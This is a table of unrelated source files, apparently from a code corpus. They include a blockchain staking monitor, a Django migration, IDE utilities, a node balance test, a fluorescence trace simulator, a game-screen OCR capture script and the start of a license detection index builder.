filename | text
---|---|
the-stack_0_6102 | from argparse import ArgumentParser
from datetime import datetime, timedelta
import pytz
import time
import curses
from attrdict import AttrDict
from hydra.app import HydraApp
from hydra.rpc.base import BaseRPC
from hydra.test import Test
COLOR_GOOD = 2
COLOR_WARN = 8
COLOR_ERROR = 4
COLOR_ETC = 10
@HydraApp.register(name="top", desc="Show status periodically", version="0.1")
class TopApp(HydraApp):
scr = None
ljust = None
@staticmethod
def parser(parser: ArgumentParser):
parser.add_argument("-i", "--interval", type=float, default=10, help="polling interval.")
parser.add_argument("-c", "--count", type=int, default=None, help="exit after (count) iterations.")
parser.add_argument("-z", "--timezone", type=str, default="America/Los_Angeles", help="time zone.")
parser.add_argument("-C", "--curses", action="store_true", help="use curses display.")
parser.add_argument("-x", "--extended", action="store_true", help="show extended info.")
def setup(self):
super().setup()
self.ljust = (30 if not self.args.full else 40)
if self.args.curses:
self._curses_setup()
def run(self):
interval = self.args.interval
count = self.args.count
display = self.display if not self.args.curses else self.display_curses
try:
while True:
display()
if count is not None:
count -= 1
if count <= 0:
break
time.sleep(interval)
finally:
if self.args.curses:
self._curses_cleanup()
def read(self):
result = AttrDict()
result.now = datetime.now(tz=pytz.timezone(self.args.timezone))
result.utcnow = datetime.utcnow()
result.connectioncount = self.rpc.getconnectioncount()
result.apr = self.rpc.getestimatedannualroi()
stakinginfo = self.rpc.getstakinginfo()
stakinginfo["search-interval"] = timedelta(seconds=stakinginfo["search-interval"])
stakinginfo.expectedtime = timedelta(seconds=stakinginfo.expectedtime)
stakinginfo.weight /= 10**8
stakinginfo.netstakeweight /= 10**8
if "errors" in stakinginfo and not stakinginfo.errors:
del stakinginfo["errors"]
if not self.args.extended:
TopApp.__try_delete(stakinginfo, "pooledtx")
result.stakinginfo = stakinginfo
walletinfo = self.rpc.getwalletinfo()
if "unlocked_until" in walletinfo:
walletinfo.unlocked_until = datetime.fromtimestamp(walletinfo.unlocked_until)
if not self.args.extended:
TopApp.__try_delete(walletinfo, "walletversion")
TopApp.__try_delete(walletinfo, "keypoololdest")
TopApp.__try_delete(walletinfo, "keypoolsize")
TopApp.__try_delete(walletinfo, "keypoolsize_hd_internal")
TopApp.__try_delete(walletinfo, "paytxfee")
TopApp.__try_delete(walletinfo, "private_keys_enabled")
if "unconfirmed_balance" in walletinfo and not walletinfo.unconfirmed_balance:
del walletinfo.unconfirmed_balance
if "immature_balance" in walletinfo and not walletinfo.immature_balance:
del walletinfo.immature_balance
TopApp.__try_delete(walletinfo, "hdseedid")
if not len(walletinfo.walletname) and not self.args.json:
walletinfo.walletname = "''"
result.walletinfo = walletinfo
if self.args.extended:
mininginfo = self.rpc.getmininginfo()
if "errors" in mininginfo and not mininginfo.errors:
del mininginfo.errors
if "warnings" in mininginfo and not mininginfo.warnings:
del mininginfo.warnings
result.mininginfo = mininginfo
return result
# noinspection PyShadowingBuiltins
def display(self, print=print):
result = self.read()
if not self.args.json:
for key, value in result.items():
if not isinstance(value, AttrDict):
print(key.ljust(self.ljust) + str(value))
else:
print()
self.render(value, name=key, print_fn=print, ljust=self.ljust)
else:
self.render(result, name="top", print_fn=print, ljust=self.ljust)
def display_curses(self):
self.scr.clear()
self.display(print=self.__print_curses)
self.scr.refresh()
def __print_curses(self, text=""):
text = str(text)
if not text.endswith("\n"):
text += "\n"
return self.scr.addstr(text)
@staticmethod
def __try_delete(dic: dict, key: str):
if key in dic:
del dic[key]
# noinspection PyMethodMayBeStatic
def _curses_cleanup(self):
curses.echo()
curses.nocbreak()
curses.endwin()
def _curses_setup(self):
self.scr = curses.initscr()
curses.noecho()
curses.cbreak()
curses.start_color()
curses.use_default_colors()
if curses.can_change_color():
curses.init_color(curses.COLOR_BLACK, 0, 0, 0)
curses.init_color(curses.COLOR_WHITE, 255, 255, 255)
curses.init_color(curses.COLOR_GREEN, 0, 255, 0)
curses.init_color(curses.COLOR_YELLOW, 255, 255, 0)
curses.init_color(curses.COLOR_RED, 255, 0, 0)
curses.init_color(curses.COLOR_MAGENTA, 255, 0, 255)
curses.init_pair(1, curses.COLOR_WHITE, -1)
curses.init_pair(2, curses.COLOR_GREEN, -1)
curses.init_pair(3, curses.COLOR_YELLOW, -1)
curses.init_pair(4, curses.COLOR_RED, -1)
curses.init_pair(5, curses.COLOR_MAGENTA, -1)
curses.init_pair(6, curses.COLOR_BLACK, curses.COLOR_WHITE)
curses.init_pair(7, curses.COLOR_BLACK, curses.COLOR_GREEN)
curses.init_pair(8, curses.COLOR_BLACK, curses.COLOR_YELLOW)
curses.init_pair(9, curses.COLOR_BLACK, curses.COLOR_RED)
curses.init_pair(10, curses.COLOR_YELLOW, -1)
@Test.register()
class TopAppTest(Test):
MY_FIRST_TEST_FIX = False
def test_0_top_runnable(self):
self.assertHydraAppIsRunnable(TopApp, "-h")
if __name__ == "__main__":
TopApp.main()
|
the-stack_0_6103 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('trackbuild', '0005_release_previous'),
]
operations = [
migrations.AlterField(
model_name='release',
name='previous',
field=models.ForeignKey(related_name='followers', to='trackbuild.Release', null=True),
),
migrations.AlterUniqueTogether(
name='release',
unique_together=set([('user', 'product', 'name', 'major', 'minor', 'patch')]),
),
]
|
the-stack_0_6104 | #-------------------------------------------------------------------------------
# Name: apputils.py
# Purpose:
#
# Author: wukan
#
# Created: 2019-01-08
# Copyright: (c) wukan 2019
# Licence: GPL-3.0
#-------------------------------------------------------------------------------
from noval import GetApp
import sys
import os
import time
import pyperclip
import psutil
import locale
import future.utils
MAINMODULE_DIR = "NOVAL_MAINMODULE_DIR"
# Whether this is a development build: set to False for official releases and to True for internal beta builds
isDev = False
def is_dev():
return isDev
def is_windows():
return os.name == 'nt'
def is_linux():
return os.name == "posix"
def is_py2():
return future.utils.PY2
def is_py3():
return future.utils.PY3
def is_py3_plus():
return sys.version_info[0] >= 3
def get_default_encoding():
try:
return locale.getpreferredencoding()
except:
return locale.getdefaultlocale()[1]
def get_default_locale():
return locale.getdefaultlocale()[0]
def _generateMainModuleDir():
mainModuleDir = os.getenv(MAINMODULE_DIR)
if mainModuleDir: # if environment variable set, return it
if is_windows():
if is_py2():
return mainModuleDir.decode(get_default_encoding())
return mainModuleDir
# On Mac, the python executable sometimes has a capital "P" so we need to
# lower the string first
sysExecLower = sys.executable.lower()
if sysExecLower == "/" or sysExecLower.find('python') != -1:
utilModuleDir = os.path.dirname(__file__)
if not os.path.isabs(utilModuleDir):
utilModuleDir = os.path.join(os.getcwd(), utilModuleDir)
mainModuleDir = os.path.normpath(os.path.join(utilModuleDir, os.path.join(os.path.pardir, os.path.pardir)))
if mainModuleDir.endswith('.zip'):
mainModuleDir = os.path.dirname(mainModuleDir) # Get rid of library.zip
else:
mainModuleDir = os.path.dirname(sys.executable)
os.environ[MAINMODULE_DIR] = mainModuleDir # pythonBug: os.putenv doesn't work, set environment variable
if is_windows():
if is_py2():
return mainModuleDir.decode(get_default_encoding())
return mainModuleDir
mainModuleDir = _generateMainModuleDir()
def getCommandNameForExecPath(execPath):
if is_windows():
return '"%s"' % execPath
return execPath
def getUserName():
if is_windows():
return os.getenv('USERNAME')
else:
# 06-Feb-06 [email protected] --
# this blows up the linux cc runs with "Inappropriate ioctl for device"
#return os.getlogin()
return os.getenv('USER')
def getCurrentTimeAsFloat():
return time.time()
systemStartTime = getCurrentTimeAsFloat()
def CopyToClipboard(str):
if is_windows():
pyperclip.copy(str)
else:
GetApp().clipboard_clear()
GetApp().clipboard_append(str)
def GetSupportableExtList():
exts = []
for template in GetApp().GetDocumentManager().GetTemplates():
filter = template.GetFileFilter()
parts = filter.split(";")
for part in parts:
ext = part.replace("*.","").strip()
exts.append(ext)
return exts
def is_ext_supportable(ext):
if ext == "":
return True
return ext.lower() in GetSupportableExtList()
def get_app_version():
# find version number from version.txt
versionFilepath = os.path.join(mainModuleDir, "version.txt")
if os.path.exists(versionFilepath):
versionfile = open(versionFilepath, 'r')
versionLines = versionfile.readlines()
versionfile.close()
version = "".join(versionLines)
else:
version = "Version Unknown - %s not found" % versionFilepath
return version
if is_py2():
from ConfigParser import ConfigParser
elif is_py3_plus():
from configparser import ConfigParser
def get_lang_config():
return int(get_config_value('IDE','Language',default_value=-1))
def get_config_path():
return os.path.join(mainModuleDir,"config.ini")
def get_config_value(section,key,default_value=None):
'''
Read a property value from the config file
'''
config_path = get_config_path()
if not os.path.exists(config_path):
return default_value
cfg = ConfigParser()
cfg.read(config_path)
if not cfg.has_option(section,key):
return default_value
return cfg.get(section,key)
def write_cofig_value(section,key,value):
'''
Initialize a property value in the config file
'''
config_path = get_config_path()
cfg = ConfigParser()
if os.path.exists(config_path):
cfg.read(config_path)
if not cfg.has_section(section):
cfg.add_section(section)
if not cfg.has_option(section,key):
cfg.set(section, key,str(value))
with open(config_path,"w+") as f:
cfg.write(f)
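# Usage sketch (illustrative only; the 'IDE'/'Language' pair mirrors get_lang_config
# above, and the value written here is just an example):
#
#   write_cofig_value('IDE', 'Language', 1)   # only writes the key if it is absent
#   lang = int(get_config_value('IDE', 'Language', default_value=-1))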
|
the-stack_0_6105 | from test.cl_node.docker_node import DockerNode
from test.cl_node.casperlabs_accounts import Account
def test_scala_client_balance(one_node_network):
node: DockerNode = one_node_network.docker_nodes[0]
# This is only in scala client, need to verify we are using correct one.
node.use_docker_client()
acct1, acct2, acct3 = [Account(i) for i in range(1, 4)]
# Perform multiple transfers with end result of Acct1 = 200, Acct2 = 100, Acct3 = 700
hashes = node.transfer_to_accounts([(1, 1000), (2, 800, 1), (3, 700, 2)])
assert node.client.get_balance(account_address=acct1.public_key_hex, block_hash=hashes[-1]) == 200
assert node.client.get_balance(account_address=acct2.public_key_hex, block_hash=hashes[-1]) == 100
assert node.client.get_balance(account_address=acct3.public_key_hex, block_hash=hashes[-1]) == 700
|
the-stack_0_6107 | # -*- coding: utf-8 -*-
"""
Created on Tue Sep 8 03:32:57 2020
@author: Jon
"""
import numpy as np
from numpy import genfromtxt
import matplotlib.pyplot as plt
import pandas as pd
from numba import jit
def ms2_loading_coeff(kappa,W):
alpha = kappa
coeff = np.ones((1,W), dtype=float)
alpha_ceil = np.ceil(alpha)
alpha_floor = np.floor(alpha)
coeff[0:int(alpha_floor):1,0] = (np.linspace(1,int(alpha_floor), endpoint=True, num=int(alpha_floor)) - 0.5) / alpha
coeff[0,int(alpha_ceil)-1] = (alpha_ceil - alpha) + (alpha**2 - (alpha_ceil-1)**2) / (2*alpha)
return coeff
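# Sanity check for ms2_loading_coeff (illustrative, values rounded): with this
# script's kappa = t_MS2 / deltaT = 30 / 20 = 1.5 and W = 13, only the partially
# filled first positions of the window are down-weighted:
#   ms2_loading_coeff(1.5, 13)  ->  [[0.333, 0.917, 1.0, 1.0, ..., 1.0]]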
#seed_setter = np.random.randint(0,1000000000) # Make sure this is random for actual run
seed_setter = 957434
np.random.seed(seed_setter)
np.seterr(divide='ignore')
# Import data
signal_holder = genfromtxt('synthetic_promoter_traces_w13.csv', delimiter=',', skip_header=0)
synthetic_x = np.arange(0,100)
# =============================================================================
# plt.figure(0)
# plt.step(synthetic_x, signal_holder[40,:])
# =============================================================================
# Initialisation
K = 2
n_traces = len(signal_holder)
W = 13
compound_states = K**W
mu = np.zeros((K,1))
mu[0,0] = 282.27
mu[1,0] = 13889.8
noise = 16414.9
t_MS2 = 30
deltaT = 20
kappa = t_MS2 / deltaT
unique_lengths = np.expand_dims(np.asarray(100), axis = 0)
trace_length = 100
#%%
# More efficient stuff
# MS2 coefficient calculation
ms2_coeff = ms2_loading_coeff(kappa, W)
ms2_coeff_flipped = np.flip(ms2_coeff, 1)
count_reduction_manual = np.zeros((1,W-1))
for t in np.arange(0,W-1):
count_reduction_manual[0,t] = np.sum(ms2_coeff[0,t+1:])
count_reduction_manual = np.reshape(count_reduction_manual, (W-1,1))
@jit(nopython=True)
def get_adjusted(state, K, W, ms2_coeff):
#ms2_coeff_flipped = np.flip(ms2_coeff_flipped, 1)
ms2_coeff_flipped = ms2_coeff
one_accumulator = 0
zero_accumulator = 0
for count in np.arange(0,W):
#print(count)
#print(state&1)
if state & 1 == 1:
#print('one')
one_accumulator = one_accumulator + ms2_coeff_flipped[0,count]
else:
#print('zero')
zero_accumulator = zero_accumulator + ms2_coeff_flipped[0,count]
state = state >> 1
#print(state)
return_list = []
return_list.append(one_accumulator)
return_list.append(zero_accumulator)
return return_list
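# Note on get_adjusted (illustrative example, not part of the original script):
# the compound state is consumed LSB-first, so bit k of `state` is paired with
# ms2_coeff[0, k]. For example, state = 0b101 with W = 3 adds ms2_coeff[0, 0] and
# ms2_coeff[0, 2] to one_accumulator and ms2_coeff[0, 1] to zero_accumulator,
# returning [one_accumulator, zero_accumulator].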
@jit(nopython=True)
def compute_dynamic_F(state, length, W, K, ms2_coeff_flipped, count_reduction_manual):
#print(datetime.datetime.now().time())
trace_length = length
state_flipped = K**W - state - 1
adjust = get_adjusted(state_flipped, K, W, ms2_coeff)
adjust_ones = adjust[0]
adjust_zeros = adjust[1]
F1_log = np.log(adjust_ones)
F0_log = np.log(adjust_zeros)
log_f0_terms = np.zeros((1, trace_length))
for i in np.arange(0, trace_length):
log_f0_terms[0,i] = F0_log
log_f1_terms_saved = np.zeros((1, trace_length))
for i in np.arange(0, trace_length):
log_f1_terms_saved[0,i] = F1_log
#log_f1_terms_saved2 = log_f1_terms_saved
for t in np.arange(0,W-1):
#print('top')
#print(np.exp(log_f1_terms_saved[0,t]))
#print('bottom')
#print(count_reduction_manual[t,])
#print(abs(float(np.exp(log_f1_terms_saved[0,t])) - count_reduction_manual[t,]))
inter = float(np.exp(log_f1_terms_saved[0,t])) - count_reduction_manual[t,]
log_f1_terms_saved[0,t] = np.log(abs(inter[0,]))
log_F_terms = []
log_F_terms.append(log_f1_terms_saved)
log_F_terms.append(log_f0_terms)
#print(datetime.datetime.now().time())
return log_F_terms
mask = np.int32((2**W)-1)
fluorescence_holder = np.zeros((100,100))
for i in np.arange(0, len(fluorescence_holder)):
single_promoter = np.expand_dims(signal_holder[i,:], axis = 0)
single_trace = np.zeros((1,100))
t = 0
window_storage = int(single_promoter[0,0])
#single_trace[0,t] = ((F_on_viewer[window_storage, t] * mu[1,0]) + (F_off_viewer[window_storage, t] * mu[0,0])) + np.random.normal(0, noise)
single_trace[0,t] = ((get_adjusted(window_storage, K, W, ms2_coeff)[0] * mu[1,0]) + (get_adjusted(window_storage, K, W, ms2_coeff)[1] * mu[0,0])) + np.random.normal(0, noise)
window_storage = 0
t = 1
present_state_list = []
present_state_list.append(int(single_promoter[0,0]))
#while t < W:
while t < 100:
present_state = int(single_promoter[0,t])
#print('present state')
#print(present_state)
#present_state_list.append(present_state)
window_storage = np.bitwise_and((present_state_list[t-1] << 1) + present_state, mask)
#print('window storage')
#print(window_storage)
present_state_list.append(window_storage)
#single_trace[0,t] = ((F_on_viewer[window_storage, t] * mu[1,0]) + (F_off_viewer[window_storage, t] * mu[0,0])) + np.random.normal(0, noise)
single_trace[0,t] = ((get_adjusted(window_storage, K, W, ms2_coeff)[0] * mu[1,0]) + (get_adjusted(window_storage, K, W, ms2_coeff)[1] * mu[0,0])) + np.random.normal(0, noise)
t = t + 1
fluorescence_holder[i,:] = single_trace
# =============================================================================
# plt.figure(2)
# plt.plot(synthetic_x, single_trace.flatten(), c='b')
# =============================================================================
sampling_dataframe = pd.DataFrame(fluorescence_holder)
sampling_dataframe.to_csv("synthetic_fluorescent_traces_w13.csv")
#transition_probabilities = [0.9 0.1;0.35 0.65];
#%%
# =============================================================================
# for j in np.arange(3,15):
# plt.figure(j)
# plt.plot(synthetic_x, fluorescence_holder[j,:].flatten())
#
# plt.figure(15)
# plt.step(synthetic_x, signal_holder[40,:])
# plt.figure(16)
# plt.plot(synthetic_x, fluorescence_holder[40,:].flatten())
#
# plt.figure(17)
# plt.step(synthetic_x, signal_holder[42,:])
# plt.figure(18)
# plt.plot(synthetic_x, fluorescence_holder[42,:].flatten())
#
# =============================================================================
|
the-stack_0_6108 | import time
import win32gui
import win32ui
import win32con
import win32api
from cnocr import CnOcr
import os
def window_capture(filename, pofw, pofh, wpct, hpct, imgfmt):
"""capture specified window and specified screen area's filename.jpg image by win32gui"""
# Get the window handle for the window with the specified title
hwnd = win32gui.FindWindow(None, "Rainbow Six")
# hwnd = 0  # window handle; 0 means the currently active window
# Get the window's device context (DC) from the window handle
hwndDC = win32gui.GetWindowDC(hwnd)
# Get an mfcDC from the window's DC
mfcDC = win32ui.CreateDCFromHandle(hwndDC)
# Create a compatible DC from the mfcDC
saveDC = mfcDC.CreateCompatibleDC()
# Create a bitmap to hold the captured image
saveBitMap = win32ui.CreateBitmap()
# Get monitor information
MoniterDev = win32api.EnumDisplayMonitors(None, None)
w = MoniterDev[0][2][2]
h = MoniterDev[0][2][3]
# print(w, h)  # image size
# Allocate space for the bitmap
sspw = int(round(pofw*w))
ssph = int(round(pofh*h))
ssw = int(round(wpct*w))
ssh = int(round(hpct*h))
print(ssw, ssh)
saveBitMap.CreateCompatibleBitmap(mfcDC, ssw, ssh)
# Select the bitmap into saveDC so the screenshot is written into saveBitMap
saveDC.SelectObject(saveBitMap)
fullfilename = filename+imgfmt
# Capture an image of size (w, h) starting from the top-left corner (0, 0)
saveBitMap.SaveBitmapFile(saveDC, fullfilename)
saveDC.BitBlt((0, 0), (ssw, ssh), mfcDC,
(sspw, ssph), win32con.SRCCOPY)
saveBitMap.SaveBitmapFile(saveDC, fullfilename)
"""win32gui.DeleteObject(saveBitMap.GetHandle())
saveDC.DeleteDC()
mfcDC.DeleteDC()
win32gui.ReleaseDC(hwnd, hwndDC)
"""
def main():
listofimgfpt = ['.jpg', '.png', '.bmp']
for i in range(7200):
beg = time.time()
print(i)
targetname = "r6ss" + str(i)
window_capture(targetname, pofw=0.6546875, pofh=0.8791666,
wpct=0.10546875, hpct=0.0597222, imgfmt=listofimgfpt[0])
fulltargetname = targetname + listofimgfpt[0]
res = CnOcr(model_name='densenet-s-gru', context='cpu',
root="C:/Users/Noone/AppData/Roaming/cnocr").ocr(fulltargetname)
with open("test.txt", "a") as f:
f.write(str(res)+" \r")
print(res)
targetpath = "D:/Onedrive/R6S_spider/"+fulltargetname
time.sleep(2)
if res == []:
os.remove(targetpath)
end = time.time()
print(end - beg)
return 0
if __name__ == '__main__':
main()
|
the-stack_0_6110 | # -*- coding: utf-8 -*-
#
# Copyright (c) nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from array import array
from collections import Counter
from collections import defaultdict
try:
import cPickle
except ImportError:
import pickle as cPickle
from functools import partial
from operator import itemgetter
import pickle
import sys
from time import time
# Python 2 and 3 support
try:
import itertools.izip as zip # NOQA
except ImportError:
pass
from intbitset import intbitset
from six import string_types
from commoncode.dict_utils import sparsify
from licensedcode import MAX_DIST
from licensedcode import SMALL_RULE
from licensedcode.legalese import common_license_words
from licensedcode import match
from licensedcode import match_aho
from licensedcode import match_hash
from licensedcode import match_seq
from licensedcode import match_set
from licensedcode import match_spdx_lid
from licensedcode.dmp import match_blocks as match_blocks_dmp
from licensedcode.seq import match_blocks as match_blocks_seq
from licensedcode import query
from licensedcode import tokenize
"""
Main license index construction, query processing and matching entry points for
license detection.
The LicenseIndex is the main class and holds the index structures. The `match`
method drives the matching using a succession of matching strategies. Actual
matching is delegated to other modules that implement a matching strategy.
"""
# Tracing flags
TRACE = False
TRACE_NEGATIVE = False
TRACE_APPROX = False
TRACE_APPROX_CANDIDATES = False
TRACE_APPROX_MATCHES = False
TRACE_INDEXING_PERF = False
TRACE_TOKEN_DOC_FREQ = False
def logger_debug(*args):
pass
if (TRACE or TRACE_NEGATIVE
or TRACE_APPROX or TRACE_APPROX_CANDIDATES or TRACE_APPROX_MATCHES
or TRACE_INDEXING_PERF):
import logging
logger = logging.getLogger(__name__)
# logging.basicConfig(level=logging.DEBUG, stream=sys.stdout)
logging.basicConfig(stream=sys.stdout)
logger.setLevel(logging.DEBUG)
def logger_debug(*args):
return logger.debug(' '.join(isinstance(a, string_types) and a or repr(a)
for a in args))
############################## Feature SWITCHES ################################
########## Ngram fragments detection
USE_AHO_FRAGMENTS = False
# length of ngrams used for fragments detection
AHO_FRAGMENTS_NGRAM_LEN = 6
########## Query run breaking using rule starts
# Feature switch to enable or not extra query run breaking based on rule starts
USE_RULE_STARTS = False
########## Use Bigrams instead of tokens
# Enable using bigrams for multisets/bags instead of tokens
USE_BIGRAM_MULTISETS = False
########## Use diff match patch myers diff for approx matching
# Enable using bigrams for multisets/bags instead of tokens
USE_DMP = False
############################## Feature SWITCHES ################################
# Maximum number of unique tokens we can handle: 16 bits signed integers are up
# to 32767. Since we use internally several arrays of ints for smaller and
# optimized storage we cannot exceed this number of tokens.
MAX_TOKENS = (2 ** 15) - 1
class LicenseIndex(object):
"""
A license detection index. An index is queried for license matches found in
a query file. The index support multiple strategies for finding exact and
approximate matches.
"""
# slots are not really needed but they help with sanity and avoid an
# unchecked proliferation of new attributes
__slots__ = (
'len_tokens',
'len_legalese',
'dictionary',
'digit_only_tids',
'tokens_by_tid',
'rules_by_rid',
'tids_by_rid',
'high_postings_by_rid',
'sets_by_rid',
'msets_by_rid',
'rid_by_hash',
'rules_automaton',
'fragments_automaton',
'negative_automaton',
'starts_automaton',
'regular_rids',
'negative_rids',
'false_positive_rids',
'approx_matchable_rids',
'optimized',
)
def __init__(self, rules=None, _legalese=common_license_words, _spdx_tokens=frozenset()):
"""
Initialize the index with an iterable of Rule objects.
`_legalese` is a set of common license-specific words aka. legalese
`_spdx_tokens` is a set of tokens used in SPDX license identifiers
"""
# total number of unique known tokens
self.len_tokens = 0
# largest token ID for a "legalese" token. A token with a larger id than
# len_legalese is considered a "junk" very common token
self.len_legalese = 0
# mapping of token string > token id
self.dictionary = {}
# set of token ids made entirely of digits
self.digit_only_tids = set()
# mapping-like of token id -> token string as a list where the index is the
# token id and the value the actual token string.
# This the reverse of the dictionary.
self.tokens_by_tid = []
# Note: all the following are mappings-like (using lists) of
# rid-> data are lists of data where the index is the rule id.
# mapping-like of rule_id -> rule objects proper
self.rules_by_rid = []
# mapping-like of rule_id -> sequence of token_ids
self.tids_by_rid = []
# mapping-like of rule id->(mapping of (token_id->[positions, ...])
# We track only high/good tokens there. This is a "traditional"
# inverted index postings list
self.high_postings_by_rid = []
# mapping-like of rule_id -> tokens ids sets/multisets
self.sets_by_rid = []
self.msets_by_rid = []
# mapping of hash -> single rid for hash match: duplicated rules are not allowed
self.rid_by_hash = {}
# Aho-Corasick automatons for regular and negative rules
self.rules_automaton = match_aho.get_automaton()
self.fragments_automaton = USE_AHO_FRAGMENTS and match_aho.get_automaton()
self.negative_automaton = match_aho.get_automaton()
self.starts_automaton = USE_RULE_STARTS and match_aho.get_automaton()
# disjunctive sets of rule ids: regular, negative, false positive
# TODO: consider using intbitset instead
self.regular_rids = set()
self.negative_rids = set()
self.false_positive_rids = set()
# These rule ids are for rules that can be matched with a sequence
# match. Other rules can only be matched exactly
self.approx_matchable_rids = set()
# if True the index has been optimized and becomes read only:
# no new rules can be added
self.optimized = False
if rules:
if TRACE_INDEXING_PERF:
start = time()
print('LicenseIndex: building index.')
# index all and optimize
self._add_rules(
rules, _legalese=_legalese, _spdx_tokens=_spdx_tokens)
if TRACE_TOKEN_DOC_FREQ:
print('LicenseIndex: token, frequency')
from itertools import chain
tf = Counter(chain.from_iterable(tids for rid, tids
in enumerate(self.tids_by_rid)
if rid in self.regular_rids))
if TRACE_INDEXING_PERF:
duration = time() - start
len_rules = len(self.rules_by_rid)
print('LicenseIndex: built index with %(len_rules)d rules in '
'%(duration)f seconds.' % locals())
self._print_index_stats()
def _add_rules(self, rules, _legalese=common_license_words, _spdx_tokens=frozenset()):
"""
Add a list of Rule objects to the index and constructs optimized and
immutable index structures.
`_legalese` is a set of common license-specific words aka. legalese
`_spdx_tokens` is a set of token strings used in SPDX license identifiers
"""
if self.optimized:
raise Exception('Index has been optimized and cannot be updated.')
# initial dictionary mapping for known legalese tokens
########################################################################
# FIXME: we should start at 1, and ids are become valid unichr values
self.dictionary = dictionary = {
ts: tid for tid, ts in enumerate(sorted(_legalese))}
dictionary_get = dictionary.get
self.len_legalese = len_legalese = len(dictionary)
highest_tid = len_legalese - 1
# Add SPDX key tokens to the dictionary
# these are always treated as non-legalese
########################################################################
for sts in _spdx_tokens:
stid = dictionary_get(sts)
if stid is None:
# we have a never yet seen token, so we assign a new tokenid
highest_tid += 1
stid = highest_tid
dictionary[sts] = stid
# OPTIMIZED
sparsify(dictionary)
self.rules_by_rid = rules_by_rid = list(rules)
len_rules = len(rules_by_rid)
# create index data structures
# OPTIMIZATION: bind frequently used methods to the local scope for index structures
########################################################################
tids_by_rid_append = self.tids_by_rid.append
false_positive_rids_add = self.false_positive_rids.add
negative_rids_add = self.negative_rids.add
regular_rids_add = self.regular_rids.add
approx_matchable_rids_add = self.approx_matchable_rids.add
# since we only use these for regular rules, these lists may be sparse.
# their index is the rule rid
self.high_postings_by_rid = high_postings_by_rid = [None] * len_rules
self.sets_by_rid = sets_by_rid = [None] * len_rules
self.msets_by_rid = msets_by_rid = [None] * len_rules
# track all duplicate rules: fail and report dupes at once at the end
dupe_rules_by_hash = defaultdict(list)
# build partials for methods that populate automatons
negative_automaton_add = partial(match_aho.add_sequence,
automaton=self.negative_automaton, with_duplicates=False)
rules_automaton_add = partial(match_aho.add_sequence,
automaton=self.rules_automaton, with_duplicates=False)
if USE_AHO_FRAGMENTS:
fragments_automaton_add = partial(match_aho.add_sequence,
automaton=self.fragments_automaton, with_duplicates=True)
if USE_RULE_STARTS:
starts_automaton_add_start = partial(match_aho.add_start,
automaton=self.starts_automaton)
# OPTIMIZED: bind frequently used objects to local scope
rid_by_hash = self.rid_by_hash
match_hash_index_hash = match_hash.index_hash
match_set_tids_set_counter = match_set.tids_set_counter
match_set_multiset_counter = match_set.multiset_counter
len_starts = SMALL_RULE
min_len_starts = SMALL_RULE * 6
ngram_len = AHO_FRAGMENTS_NGRAM_LEN
# Index each rule
########################################################################
for rid, rule in enumerate(rules_by_rid):
# assign rid
rule.rid = rid
rule_token_ids = array('h', [])
tids_by_rid_append(rule_token_ids)
# A rule is weak if it does not contain at least one legalese word:
# we consider all rules to be weak until proven otherwise below.
# "weak" rules can only be matched with an automaton.
is_weak = True
for rts in rule.tokens():
rtid = dictionary_get(rts)
if rtid is None:
# we have a never yet seen token, so we assign a new tokenid
# note: we could use the length of the dictionary instead
highest_tid += 1
rtid = highest_tid
dictionary[rts] = rtid
if is_weak and rtid < len_legalese:
is_weak = False
rule_token_ids.append(rtid)
# build hashes index and check for duplicates rule texts
rule_hash = match_hash_index_hash(rule_token_ids)
dupe_rules_by_hash[rule_hash].append(rule)
# classify rules and build disjuncted sets of rids
if rule.is_negative:
# negative rules are matched early and their tokens are only
# exactly matched. When matched as a whole, their tokens are
# removed from the token stream
negative_rids_add(rid)
negative_automaton_add(tids=rule_token_ids, rid=rid)
continue
####################
# populate automaton with the whole rule tokens sequence, for all
# RULEs, be they "standard"/regular, weak, false positive or small
# (but not negative)
####################
rules_automaton_add(tids=rule_token_ids, rid=rid)
if rule.is_false_positive:
# False positive rules do not participate in the set or sequence
# matching at all: they are used for exact matching and in post-
# matching filtering
false_positive_rids_add(rid)
continue
# from now on, we have regular rules
rid_by_hash[rule_hash] = rid
regular_rids_add(rid)
# Some rules cannot be matched as a sequence: these are "weak" rules
if not is_weak:
approx_matchable_rids_add(rid)
####################
# update high postings: positions by high tids used to
# speed up sequence matching
####################
# no postings for rules that cannot be matched as a sequence (too short and weak)
# TODO: this could be optimized with a group_by
postings = defaultdict(list)
for pos, tid in enumerate(rule_token_ids):
if tid < len_legalese:
postings[tid].append(pos)
# OPTIMIZED: for speed and memory: convert postings to arrays
postings = {tid: array('h', value) for tid, value in postings.items()}
# OPTIMIZED: for speed, sparsify dict
sparsify(postings)
high_postings_by_rid[rid] = postings
####################
# ... and ngram fragments: compute ngrams and populate an automaton with ngrams
####################
if USE_AHO_FRAGMENTS and rule.minimum_coverage < 100 and rule.length > ngram_len:
all_ngrams = tokenize.ngrams(rule_token_ids, ngram_length=ngram_len)
all_ngrams_with_pos = tokenize.select_ngrams(all_ngrams, with_pos=True)
# all_ngrams_with_pos = enumerate(all_ngrams)
for pos, ngram in all_ngrams_with_pos:
fragments_automaton_add(tids=ngram, rid=rid, start=pos)
####################
# use the start and end of this rule as a break point for query runs
####################
if USE_RULE_STARTS and rule.length > min_len_starts:
starts_automaton_add_start(
tids=rule_token_ids[:len_starts],
rule_identifier=rule.identifier,
rule_length=rule.length)
####################
# build sets and multisets indexes, for all regular rules as we need
# the thresholds
####################
tids_set, mset = match_set.build_set_and_mset(
